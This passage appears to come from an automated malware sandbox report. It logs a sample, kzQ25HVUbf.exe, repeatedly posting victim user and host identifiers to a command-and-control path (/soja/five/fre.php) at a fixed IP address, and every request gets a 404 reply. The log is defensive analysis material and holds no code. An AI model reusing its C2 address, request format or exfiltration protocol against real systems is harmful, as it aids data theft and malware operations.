Jan 11, 2025 08:37:40.155107021 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:40.160259008 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:40.867495060 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49987	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:41.021596909 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:41.027625084 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:41.715739012 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	49993	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:41.872127056 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:41.877046108 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:42.601721048 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	49999	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:42.761287928 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:42.766185999 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:43.489492893 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	50006	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:43.642792940 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:43.647766113 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:44.355365992 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	50009	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:44.504832029 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:44.509809017 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:45.204397917 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	50010	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:45.346792936 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:45.351886034 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:46.086905956 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	50011	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:46.243031979 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:46.247937918 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:46.977591038 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	50012	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:47.136224031 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:47.141185999 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:47.837078094 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	50013	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:47.988188982 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:47.993043900 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:48.698934078 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	50014	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:48.846707106 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:48.851758003 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:49.557455063 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.9	50015	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:49.705311060 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:49.710357904 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:50.432254076 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	50016	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:50.584074974 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:50.589001894 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:51.359774113 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.9	50017	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:51.528808117 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:51.533741951 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:52.255506039 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.9	50018	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:52.415730000 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:52.420648098 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:53.124048948 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.9	50019	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:53.276341915 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:53.281289101 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:54.003082037 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.9	50020	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:54.144908905 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:54.149795055 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:54.849924088 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.9	50021	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:55.442534924 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:55.447402000 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:56.132185936 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.9	50022	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:56.291718006 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:56.296588898 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:57.012861013 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.9	50023	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:57.163176060 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:57.168024063 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:57.903196096 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.9	50024	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:58.103395939 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:58.108289957 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:58.830260038 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.9	50025	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:58.992737055 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:58.997731924 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:59.712804079 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.9	50027	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
